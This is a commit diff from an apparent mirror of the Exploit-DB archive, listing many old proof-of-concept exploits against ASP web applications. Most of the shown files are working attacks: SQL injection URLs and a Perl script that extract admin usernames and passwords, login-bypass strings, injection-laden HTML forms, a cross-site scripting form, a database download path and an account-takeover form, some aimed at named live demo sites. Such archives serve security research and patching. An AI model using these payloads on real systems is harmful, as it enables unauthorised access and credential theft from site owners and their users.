bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions

Updated 12_08_2013

Browse source
This commit is contained in:
Offensive Security 2013-12-08 16:08:13 +00:00
parent 2039e282e8
commit 5a468df6b9
383 changed files with 31976 additions and 28274 deletions
Show stats Download patch file Download diff file Expand all files Collapse all files

4031
files.csv
View file

File diff suppressed because it is too large Load diff

0
platforms/webapps/10372.txt → platforms/aix/webapps/10372.txt
View file

0
platforms/webapps/11580.txt → platforms/aix/webapps/11580.txt
View file

74
platforms/asp/webapps/1399.txt
View file

@ -1,37 +1,37 @@
<!-- <!--
Vulnerable products : Vulnerable products :
webwiz site news access2000 : vesion 3.06 and prior versions webwiz site news access2000 : vesion 3.06 and prior versions
webwiz journal access2000 : version 1.0 webwiz journal access2000 : version 1.0
webwiz weekly poll access2000 : version 3.06 and prior versions webwiz weekly poll access2000 : version 3.06 and prior versions
database login access2000 : version 1.71 and prior versions database login access2000 : version 1.71 and prior versions
webwiz site news access97 : version 3.06 and prior versions webwiz site news access97 : version 3.06 and prior versions
webwiz journal access97 : version 1.0 webwiz journal access97 : version 1.0
webwiz weekly poll access97 : version 3.06 and prior versions webwiz weekly poll access97 : version 3.06 and prior versions
database login access97 : version 1.71 and prior versions database login access97 : version 1.71 and prior versions
Proof of Concepts : Proof of Concepts :
--> -->
<html> <html>
<h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1> <h1>WebWiz Scripts Login Bypass PoC - site news , journal , weekly poll - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p> <p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p> <p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp"> <form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='"> <input type="hidden" name="txtUserName" value="'union all select '1','1' from tblConfiguration where ''='">
<input type="hidden" name="txtUserPass" value="1"> <input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit"> <input type="submit" value="Submit" name="submit">
</form></html> </form></html>
<html> <html>
<h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1> <h1>WebWiz Login Bypass PoC - Database login - Kapda `s advisory </h1>
<p> Discovery and exploit by devil_box [at} kapda.ir</p> <p> Discovery and exploit by devil_box [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p> <p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers Institute of Iran</a></p>
<form method="POST" action="http://target/[product]/check_user.asp"> <form method="POST" action="http://target/[product]/check_user.asp">
<input type="hidden" name="txtUserName" value="'union select 1 from tblusers where''='"> <input type="hidden" name="txtUserName" value="'union select 1 from tblusers where''='">
<input type="hidden" name="txtUserPass" value="1"> <input type="hidden" name="txtUserPass" value="1">
<input type="submit" value="Submit" name="submit"> <input type="submit" value="Submit" name="submit">
</form></html> </form></html>
# milw0rm.com [2005-12-30] # milw0rm.com [2005-12-30]

38
platforms/asp/webapps/2287.txt
View file

@ -1,19 +1,19 @@
################################################################################ ################################################################################
## ## ## ##
## Icblogger <= "YID" Remote Blind SQL Injection ## ## Icblogger <= "YID" Remote Blind SQL Injection ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## Credit by | Chironex Fleckeri ## ## Credit by | Chironex Fleckeri ##
## Mail | ChironeX.FleckeriX@Gmail.Com ## ## Mail | ChironeX.FleckeriX@Gmail.Com ##
## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ## ## - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - ##
## ## ## ##
################################################################################ ################################################################################
########################################################################################################################################################################## ##########################################################################################################################################################################
#Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 # #Usage : http://www.target.com/path/devam.asp?YID=-1 UNION SELECT null,null,null,null,null,editor_adi,null,editor_sifre,editor_mail,null FROM editor WHERE editor_id = 1 #
########################################################################################################################################################################## ##########################################################################################################################################################################
############################################################# #############################################################
#Admin Panel : http://www.target.com/path/admin/default.asp # #Admin Panel : http://www.target.com/path/admin/default.asp #
############################################################# #############################################################
# milw0rm.com [2006-09-01] # milw0rm.com [2006-09-01]

40
platforms/asp/webapps/2371.txt
View file

@ -1,20 +1,20 @@
+++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++
+ Haberx v1.1 (tr) SQL Injection Vulnerability + + Haberx v1.1 (tr) SQL Injection Vulnerability +
+ Author : Fix TR + + Author : Fix TR +
+ Site : www.hack.gen.tr + + Site : www.hack.gen.tr +
+ Contact : fixtr[at]bsdmail.com + + Contact : fixtr[at]bsdmail.com +
+++++++++++++++++++++++++++++++++++++++++++++++++++ +++++++++++++++++++++++++++++++++++++++++++++++++++
+ Download: http://www.aspindir.com/Goster/3983 + Download: http://www.aspindir.com/Goster/3983
+ Versions: 1.02 between 1.1 + Versions: 1.02 between 1.1
+ Bug In : kategorix.asp + Bug In : kategorix.asp
+ Risk : High + Risk : High
+ Admin Nick: + Admin Nick:
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1 http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1
+ Admin Password: (Big Letters) + Admin Password: (Big Letters)
http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1 http://[target]/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1
# milw0rm.com [2006-09-15] # milw0rm.com [2006-09-15]

82
platforms/asp/webapps/2387.txt
View file

@ -1,41 +1,41 @@
Vulnerability Report Vulnerability Report
******************************************************************************* *******************************************************************************
# Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability # Title : Charon Cart v3(Review.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Script Page : http://www.charon.co.uk # Script Page : http://www.charon.co.uk
# Exploit; # Exploit;
******************************************************************************* *******************************************************************************
###http://[target]/[path]/Review.asp?ProductID=[SQL HERE] ###http://[target]/[path]/Review.asp?ProductID=[SQL HERE]
Example: Example:
//Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201 //Review.asp?ProductID=-1%20union%20select%20CustomerPassword%20from%20Customers%20Where%20CustomerID%20=%201
//Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201 //Review.asp?ProductID=-1%20union%20select%20CustomerEmail%20from%20Customers%20Where%20CustomerID%20=%201
Email and Password ==> login.asp [L0gin P4Ge] Email and Password ==> login.asp [L0gin P4Ge]
Columns; Columns;
""""""""""""""""""""" """""""""""""""""""""
CustomerID CustomerID
""""""""""""""""""""" """""""""""""""""""""
CustomerEmail CustomerEmail
""""""""""""""""""""" """""""""""""""""""""
CustomerPassword CustomerPassword
""""""""""""""""""""" """""""""""""""""""""
ShipCountry ShipCountry
""""""""""""""""""""" """""""""""""""""""""
Phone Phone
""""""""""""""""""""" """""""""""""""""""""
......... .........
""""""""""""""""""""" """""""""""""""""""""
.... ....
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-09-17] # milw0rm.com [2006-09-17]

38
platforms/asp/webapps/2773.txt
View file

@ -1,19 +1,19 @@
******************************************************************************* *******************************************************************************
# Title : Estate Agent Manager <= v1.3 (default.asp) Remote Login ByPass SQL Injection Vulnerability # Title : Estate Agent Manager <= v1.3 (default.asp) Remote Login ByPass SQL Injection Vulnerability
# Author : ajann # Author : ajann
******************************************************************************* *******************************************************************************
Example: Example:
###http://[target]/[path]/admin/ ###http://[target]/[path]/admin/
UserName: ' union select 0,0 from admin UserName: ' union select 0,0 from admin
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2006-11-13] # milw0rm.com [2006-11-13]

9
platforms/asp/webapps/30048.html Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24033/info
VP-ASP Shopping Cart is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.
VP-ASP Shopping Cart 6.50 is vulnerable; other versions may also be affected.
<!-- VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability A cross-site scripting vulnerability in VP-ASP Shopping Cart 6.50 was discovered. The vendor, VP-ASP, shipped an official patch on May 16th, 2007. Vulnerable Variable: type Vulnerable File: shopcontent.asp Vulnerable: VP-ASP Shopping Cart 6.50 (other versions should also be vulnerable) Google d0rk: intitle:"VP-ASP Shopping Cart 6.50" John Martinelli john@martinelli.com RedLevel Security http://www.RedLevel.org May 16th, 2007 !--> <html> <head><title>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</title><body> <center><br><br> <font size=4>VP-ASP Shopping Cart 6.50 - Cross-Site Scripting Vulnerability</font><br> <font size=3>discovered by <a href="http://john-martinelli.com">John Martinelli</a> of <a href="http://redlevel.org">RedLevel Security</a><br><br> Google d0rk: <a href="http://www.google.com/search?q=intitle%3A%22VP-ASP+Shopping+Cart+6.50%22">intitle:"VP-ASP Shopping Cart 6.50"</a> </font><br><br><br> <center>file <b>shopcontent.asp</b> - variable <b>type</b> - method <b>get</b></center><br> <form action="http://www.example.com/shop/shopcontent.asp" method="get"> <input size=75 name="type" value="<body onload=alert(1)>"> <input type=submit value="Execute XSS Attack" class="button"> </form> <br><br><br> </form> </body></html>

9
platforms/asp/webapps/30077.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/24119/info
Cisco CallManager is prone to a cross-site scripting vulnerability because the application fails to sufficiently sanitize user-supplied input.
Exploiting this vulnerability could allow an attacker to perform cross-site scripting attacks on unsuspecting users in the context of the affected website. As a result, the attacker may be able to steal cookie-based authentication credentials and to launch other attacks.
Cisco CallManager 4.1.1 is reported vulnerable; other versions may also be affected.
https://www.example.com/CCMAdmin/serverlist.asp?findBy=servername&match=begins&pattern=[xss]

206
platforms/asp/webapps/3048.pl
View file

@ -1,103 +1,103 @@
#!/usr/bin/perl #!/usr/bin/perl
#[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit #[Script Name: Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
#[Coded by : ajann #[Coded by : ajann
#[Author : ajann #[Author : ajann
#[Contact : :( #[Contact : :(
#[S.Page : http://www.websitedesignsforless.com #[S.Page : http://www.websitedesignsforless.com
#[$$ : $9.95 #[$$ : $9.95
#[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #.. #[Message : Tum Musluman Aleminin Kurban Bayrami Mubarek Olsun #..
#[.. : ajann,Turkey #[.. : ajann,Turkey
# 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201 # 2006.01 //coupon_detail.asp?key=-1%20union%20select%200,0,xusername,0,0,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%201
use IO::Socket; use IO::Socket;
if(@ARGV < 1){ if(@ARGV < 1){
print " print "
[======================================================================== [========================================================================
[// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit [// Click N' Print Coupons <= V2005.01 (key) Remote SQL Injection Exploit
[// Usage: exploit.pl [target] [// Usage: exploit.pl [target]
[// Example: exploit.pl victim.com [// Example: exploit.pl victim.com
[// Example: exploit.pl victim.com [// Example: exploit.pl victim.com
[// Vuln&Exp : ajann [// Vuln&Exp : ajann
[======================================================================== [========================================================================
"; ";
exit(); exit();
} }
#Local variables #Local variables
$server = $ARGV[0]; $server = $ARGV[0];
$server =~ s/(http:\/\/)//eg; $server =~ s/(http:\/\/)//eg;
$host = "http://".$server; $host = "http://".$server;
$port = "80"; $port = "80";
$file = "/coupon_detail.asp?key="; $file = "/coupon_detail.asp?key=";
print "Script <DIR> : "; print "Script <DIR> : ";
$dir = <STDIN>; $dir = <STDIN>;
chop ($dir); chop ($dir);
if ($dir =~ /exit/){ if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n"; print "-- Exploit Failed[You Are Exited] \n";
exit(); exit();
} }
if ($dir =~ /\//){} if ($dir =~ /\//){}
else { else {
print "-- Exploit Failed[No DIR] \n"; print "-- Exploit Failed[No DIR] \n";
exit(); exit();
} }
print "User <ID> : "; print "User <ID> : ";
$ID = <STDIN>; $ID = <STDIN>;
chop ($ID); chop ($ID);
if ($ID =~ /exit/){ if ($ID =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n"; print "-- Exploit Failed[You Are Exited] \n";
exit(); exit();
} }
$len=length($ID); $len=length($ID);
if ($len == 1){} if ($len == 1){}
else { else {
print "-- Exploit Failed[No User Id] \n"; print "-- Exploit Failed[No User Id] \n";
exit(); exit();
} }
$target = "-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID; $target = "-1%20union%20select%200,0,0,xusername,xpassword,0,0,0,0,0,0,0,0,0%20from%20login%20where%20id%20like%20".$ID;
$target = $host.$dir.$file.$target; $target = $host.$dir.$file.$target;
#Writing data to socket #Writing data to socket
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
print "+ Trying to connect: $server\n"; print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n"; $socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr => "$server", PeerPort => "$port") || die "\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n"; print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n"; print $socket "Host: $server\n";
print $socket "Accept: */*\n"; print $socket "Accept: */*\n";
print $socket "Connection: close\n\n"; print $socket "Connection: close\n\n";
print "+ Connected!...\n"; print "+ Connected!...\n";
#Getting #Getting
while($answer = <$socket>) { while($answer = <$socket>) {
if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){ if ($answer =~ /color=\"#FF0000\">(.*?)<\/font>/){
print "+ Exploit succeed! Getting admin information.\n"; print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n"; print "+ ---------------- +\n";
print "+ Username: $1\n"; print "+ Username: $1\n";
} }
if ($answer =~ /<font size=\"4\"><b>(.*?)<br>/){ if ($answer =~ /<font size=\"4\"><b>(.*?)<br>/){
print "+ Password: $1\n"; print "+ Password: $1\n";
} }
if ($answer =~ /Syntax error/) { if ($answer =~ /Syntax error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
if ($answer =~ /Internal Server Error/) { if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : ( \n"; print "+ Exploit Failed : ( \n";
print "+**********************************************************************+\n"; print "+**********************************************************************+\n";
exit(); exit();
} }
} }
# milw0rm.com [2006-12-30] # milw0rm.com [2006-12-30]

50
platforms/asp/webapps/3187.txt
View file

@ -1,25 +1,25 @@
******************************************************************************* *******************************************************************************
# Title : ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability # Title : ASP NEWS <= V3 (news_detail.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# S.Page : http://www.planetgraphic.de/ # S.Page : http://www.planetgraphic.de/
******************************************************************************* *******************************************************************************
[[SQL]]]--------------------------------------------------------- [[SQL]]]---------------------------------------------------------
http://[target]/[path]//news_detail.asp?id=[SQL] http://[target]/[path]//news_detail.asp?id=[SQL]
Example: Example:
//news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers //news_detail.asp?id=-1%20union%20select%200,username,password,0,0,0%20from%20tblusers
[[/SQL]] [[/SQL]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2007-01-24] # milw0rm.com [2007-01-24]

52
platforms/asp/webapps/3194.txt
View file

@ -1,26 +1,26 @@
******************************************************************************* *******************************************************************************
# Title : makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability # Title : makit news/blog poster <=v3(news_page.asp) Remote SQL Injection Vulnerability
# Author : ajann # Author : ajann
# Contact : :( # Contact : :(
# S.Page : http://www.makit.net # S.Page : http://www.makit.net
# $$ : Free # $$ : Free
******************************************************************************* *******************************************************************************
[[SQL]]]--------------------------------------------------------- [[SQL]]]---------------------------------------------------------
http://[target]/[path]//news_page.asp?uid=[SQL] http://[target]/[path]//news_page.asp?uid=[SQL]
Example: Example:
//news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1 //news_page.asp?uid=-1'%20union%20select%200,0,0,uname,pword,0,0,0%20from%20users%20where%20'1=1
[[/SQL]] [[/SQL]]
""""""""""""""""""""" """""""""""""""""""""
# ajann,Turkey # ajann,Turkey
# ... # ...
# Im not Hacker! # Im not Hacker!
# milw0rm.com [2007-01-25] # milw0rm.com [2007-01-25]

60
platforms/asp/webapps/3321.txt
View file

@ -1,30 +1,30 @@
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability Snitz Forums 2000 Version 3.1 SR4 (pop_profile.asp) Remote SQL Injection Vulnerability
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
Bulan: xoron Bulan: xoron
xoron.info - xoron.biz xoron.info - xoron.biz
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
POC: pop_profile.asp?mode=display&id=[SQL-INJ] POC: pop_profile.asp?mode=display&id=[SQL-INJ]
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
Username: Username:
pop_profile.asp?mode=display&id=1 pop_profile.asp?mode=display&id=1
Pass: Pass:
pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS pop_profile.asp?mode=display&id=-1+union+all+select+0,M_PASSWORD,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31+from+FORUM_MEMBERS
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
Thanx: str0ke, kacper, shika Thanx: str0ke, kacper, shika
Tesekkurler: pang0, chaos, can bjorn, DJR Tesekkurler: pang0, chaos, can bjorn, DJR
=================================X=O=R=O=N================================= =================================X=O=R=O=N=================================
# milw0rm.com [2007-02-16] # milw0rm.com [2007-02-16]

88
platforms/asp/webapps/7273.txt
View file

@ -1,44 +1,44 @@
[~] ----------------------------بسم الله الرحمن الرحيم------------------------------ [~] ----------------------------بسم الله الرحمن الرحيم------------------------------
[~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability [~]Tybe:(Auth Bypass) Remote SQL Injection Vulnerability
[~]Vendor:www.activewebsoftwares.com [~]Vendor:www.activewebsoftwares.com
[~]Software: Active Force Matrix v 2 [~]Software: Active Force Matrix v 2
[~]author: ((я3d D3v!L)) [~]author: ((я3d D3v!L))
[~] Date: 28.11.2008 [~] Date: 28.11.2008
[~] Home: www.ahacker.biz [~] Home: www.ahacker.biz
[~] contact: N/A [~] contact: N/A
[~] ----------------------------------------------------------- [~] -----------------------------------------------------------
[~] Exploit: [~] Exploit:
username: r0' or ' 1=1-- username: r0' or ' 1=1--
password: r0' or ' 1=1-- password: r0' or ' 1=1--
[~]login 4 d3m0: [~]login 4 d3m0:
http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp http://www.activewebsoftwares.com/demoactiveforcematrix/account.asp
[~]-------------------------------------------------------------------------------- [~]--------------------------------------------------------------------------------
[~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري [~] Greetz tO: {str0ke} &keta &m4n0n & maxmos & EV!L KS@ & hesham_hacker &الزهيري
[~] [~]
[~] spechial thanks : dolly & 7am3m & عماد & {str0ke} [~] spechial thanks : dolly & 7am3m & عماد & {str0ke}
[~] [~]
[~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller [~] EV!L !NS!D3 734M --- R3d-D3v!L--EXOT!C --poison scorbion --samakiller
[~] [~]
[~] xp10.biz & ahacker.biz [~] xp10.biz & ahacker.biz
[~] [~]
[~]-------------------------------------------------------------------------------- [~]--------------------------------------------------------------------------------
# milw0rm.com [2008-11-29] # milw0rm.com [2008-11-29]

30
platforms/asp/webapps/7445.txt
View file

@ -1,15 +1,15 @@
######################################################### #########################################################
--------------------------------------------------------- ---------------------------------------------------------
Portal Name: Discussion Web Portal Name: Discussion Web
Version : 4.0 Version : 4.0
Vendor : http://www.takempis.com/aboutdiscussion.htm Vendor : http://www.takempis.com/aboutdiscussion.htm
Author : Pouya_Server , Pouya.s3rver@Gmail.com Author : Pouya_Server , Pouya.s3rver@Gmail.com
Vulnerability : (DD) Vulnerability : (DD)
--------------------------------------------------------- ---------------------------------------------------------
######################################################### #########################################################
[DD]: [DD]:
http://site.com/[Path]/_private/discussion.mdb http://site.com/[Path]/_private/discussion.mdb
--------------------------------- ---------------------------------
# milw0rm.com [2008-12-14] # milw0rm.com [2008-12-14]

60
platforms/asp/webapps/7464.txt
View file

@ -1,30 +1,30 @@
########################################################################### ###########################################################################
#-------------------------------AlpHaNiX----------------------------------# #-------------------------------AlpHaNiX----------------------------------#
########################################################################### ###########################################################################
#Found By : AlpHaNiX #Found By : AlpHaNiX
#website : www.offensivetrack.org #website : www.offensivetrack.org
#contact : AlpHa[AT]HACKER[DOT]BZ #contact : AlpHa[AT]HACKER[DOT]BZ
########################################################################### ###########################################################################
#script : RealtyListing V1/V2 #script : RealtyListing V1/V2
#download : null #download : null
#Demo : http://www.aspsiteware.com/Realty1 #Demo : http://www.aspsiteware.com/Realty1
http://www.aspsiteware.com/realty2/realty2/ http://www.aspsiteware.com/realty2/realty2/
########################################################################### ###########################################################################
#Exploits : #Exploits :
--=[SQL INJECTION]=-- --=[SQL INJECTION]=--
http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users# http://www.aspsiteware.com/Realty1/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users# http://www.aspsiteware.com/Realty1/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users#
http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users http://www.aspsiteware.com/realty2/realty2/detail.asp?iPro=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users http://www.aspsiteware.com/realty2/realty2/type.asp?iType=0+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25+from+users
########################################################################### ###########################################################################
# milw0rm.com [2008-12-14] # milw0rm.com [2008-12-14]

254
platforms/asp/webapps/7736.htm
View file

@ -1,127 +1,127 @@
******************************************************************************* *******************************************************************************
# Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit # Title : Comersus Shopping Cart <= v6 Remote User Pass Exploit
# Author : "ajann" from Turkey # Author : "ajann" from Turkey
# Contact : :( # Contact : :(
# S.Page : http://www.comersus.com/ # S.Page : http://www.comersus.com/
# $$ : Free # $$ : Free
# Dork : Powered by Comersus v6 Shopping Cart # Dork : Powered by Comersus v6 Shopping Cart
# DorkEx : # DorkEx :
http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta= http://www.google.com.tr/search?hl=tr&q=Powered+by+Comersus+v6+Shopping+Cart&btnG=Ara&meta=
KAHROLSUN ISRAEL KAHROLSUN ISRAEL
-Register Site -Register Site
-Login -Login
-Open Exploit -Open Exploit
-Edit: User Email , User Password -Edit: User Email , User Password
-Submit Form -Submit Form
******************************************************************************* *******************************************************************************
<form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp"> <form method="post" name="modCust" action="http://target/[path]/comersus_customerModifyExec.asp">
<table width="421" border="0"> <table width="421" border="0">
<tr> <tr>
</tr> </tr>
<tr> <tr>
<td width="168">Name</td> <td width="168">Name</td>
<td width="220"> <td width="220">
<input type=text name=customerName value="test"> <input type=text name=customerName value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Last Name</td> <td width="168">Last Name</td>
<td width="220"> <td width="220">
<input type=text name=lastName value="test"> <input type=text name=lastName value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Company</td> <td width="168">Company</td>
<td width="220"> <td width="220">
<input type=text name=customerCompany value="test"> <input type=text name=customerCompany value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Phone</td> <td width="168">Phone</td>
<td width="220"> <td width="220">
<input type=text name=phone value="123456789"> <input type=text name=phone value="123456789">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168"><strong>Email</strong></td> <td width="168"><strong>Email</strong></td>
<td width="220"> <td width="220">
<input type="text" name="email" value="Please Add Mail"> <input type="text" name="email" value="Please Add Mail">
Edit Edit
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168"><strong>Password</strong></td> <td width="168"><strong>Password</strong></td>
<td width="220"> <td width="220">
<input type=text name=password value="Please Add Pass"> <input type=text name=password value="Please Add Pass">
Edit Edit
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Address</td> <td width="168">Address</td>
<td width="220"> <td width="220">
<input type=text name=address value="test"> <input type=text name=address value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Zip</td> <td width="168">Zip</td>
<td width="220"> <td width="220">
<input type=text name=zip value="08050"> <input type=text name=zip value="08050">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">State</td> <td width="168">State</td>
<td width="220"> <td width="220">
<SELECT name=stateCode size=1> <SELECT name=stateCode size=1>
<OPTION value="">Select the state <OPTION value="">Select the state
<option value="1">Please Type County below <option value="1">Please Type County below
</OPTION> </OPTION>
</SELECT> </SELECT>
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Non listed state</td> <td width="168">Non listed state</td>
<td width="220"> <td width="220">
<input type=text name=state value=""> <input type=text name=state value="">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">City</td> <td width="168">City</td>
<td width="220"> <td width="220">
<input type=text name=city value="test"> <input type=text name=city value="test">
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">Country</td> <td width="168">Country</td>
<td width="220"> <td width="220">
<SELECT name=countryCode> <SELECT name=countryCode>
<OPTION value="">Select the country <OPTION value="">Select the country
<option value="AF" selected>AFGHANISTAN <option value="AF" selected>AFGHANISTAN
</OPTION> </OPTION>
</SELECT> </SELECT>
</td> </td>
</tr> </tr>
<tr> <tr>
<td width="168">&nbsp;</td> <td width="168">&nbsp;</td>
<td width="220">&nbsp;</td> <td width="220">&nbsp;</td>
</tr> </tr>
<tr> <tr>
<td colspan="2"> <td colspan="2">
<input type="submit" name="Modify" value="Modify"> <input type="submit" name="Modify" value="Modify">
</td> </td>
</tr> </tr>
</table> </table>
</form> </form>
# milw0rm.com [2009-01-12] # milw0rm.com [2009-01-12]

88
platforms/asp/webapps/8120.txt
View file

@ -1,44 +1,44 @@
@~~=======================================~~@ @~~=======================================~~@
====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG===== ====C4TEAM.ORG====ByALBAYX====C4TEAM.ORG=====
@~~=======================================~~@ @~~=======================================~~@
@~~=Author : ByALBAYX @~~=Author : ByALBAYX
@~~=Website : WWW.C4TEAM.ORG @~~=Website : WWW.C4TEAM.ORG
@~~=From : Turkish @~~=From : Turkish
@~~=======================================~~@ @~~=======================================~~@
@~~=Script :SkyPortal Downloads Manager v1.1 @~~=Script :SkyPortal Downloads Manager v1.1
@~~=S.Site :http://skyportal.net @~~=S.Site :http://skyportal.net
@~~=Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip @~~=Download :http://skyportal.net/downloads/modules/mod_downloads_1_1.zip
@~~=Demo :http://vegtrafikk.net @~~=Demo :http://vegtrafikk.net
@~~=======================================~~@ @~~=======================================~~@
@~~=Vul: @~~=Vul:
